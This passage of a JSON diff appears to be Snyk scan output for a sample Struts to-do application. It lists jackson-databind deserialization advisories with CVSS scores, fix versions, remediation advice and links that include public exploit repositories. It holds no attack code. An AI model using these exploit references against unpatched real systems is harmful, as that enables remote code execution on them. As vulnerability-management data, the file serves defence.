"enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-06-19T14:34:16Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-06-19T14:34:16Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.077144Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "College of software Nankai University" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.9.9.1", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable when the feature Polymorphic Type Handling (PTH) is enabled." 
+ }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html", + "title": "Debian Security Announcement" + }, + { + "url": "https://github.com/jas502n/CVE-2019-12384", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", + "title": "Github Fix" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2334", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Jackson CVEs Don't Panic - Blog" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x", + "title": "Release Notes" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:36.645685Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:50.734463Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": 
"2024-03-06T14:04:45.683422Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.645685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:50.734463Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data which allows attackers to have a variety of impacts by leveraging failure to block the `logback-core` class from polymorphic deserialization. Depending on the `classpath` content, remote code execution may be possible.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [Debian Security Announcement](https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html)\n- [Exploit](https://github.com/jas502n/CVE-2019-12384)\n- [Github Fix](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2334)\n- [Jackson CVEs Don't Panic - Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Release Notes](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x)\n", + "epssDetails": { + "percentile": "0.97607", + "probability": "0.53288", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12384" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mph4-vhrx-mv67" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-06-25T10:06:54.889582Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-05-28T10:27:59Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + 
"maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-06-25T10:26:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.734463Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.9.2", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", + "title": "GitHub Comparison" + }, + { + "url": 
"https://github.com/FasterXML/jackson-databind/issues/2387", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2389", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2395", + "title": "GitHub Issue" + }, + { + "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", + "title": "Snyk Blog" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:45.849047Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:54.502907Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.033731Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:45.849047Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.502907Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
`SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14439](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", + "epssDetails": { + "percentile": "0.83638", + "probability": "0.00984", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14379" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6fpp-rgj9-8rwc", + "GHSA-gwp4-hfv6-p7hw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": 
"2019-07-29T14:55:33.030000Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-07-29T12:40:42Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-07-29T12:40:42Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.502907Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.pr2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": 
"enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2449", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:54.800234Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:53.931793Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:42.808389Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:54.800234Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.931793Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariDataSource` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-14540.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2449)\n", + "epssDetails": { + "percentile": "0.71702", + "probability": "0.00342", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16335" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-85cw-hj65-qqv9" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T13:03:06.837179Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.pr2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-15T23:30:24Z", 
+ "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T23:30:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.931793Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "credit": [ + "iSafeBlue" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/LeadroyaL/cve-2019-14540-exploit", + "title": "Exploit" + }, + { + "url": 
"https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2410", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:47.850814Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.008832Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:42.892322Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:47.850814Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.008832Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariConfig` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-16335.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [Exploit](https://github.com/LeadroyaL/cve-2019-14540-exploit)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2410)\n", + "epssDetails": { + "percentile": "0.74104", + "probability": "0.00410", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14540" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-h822-r4r5-v8jg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T13:03:10.401907Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + 
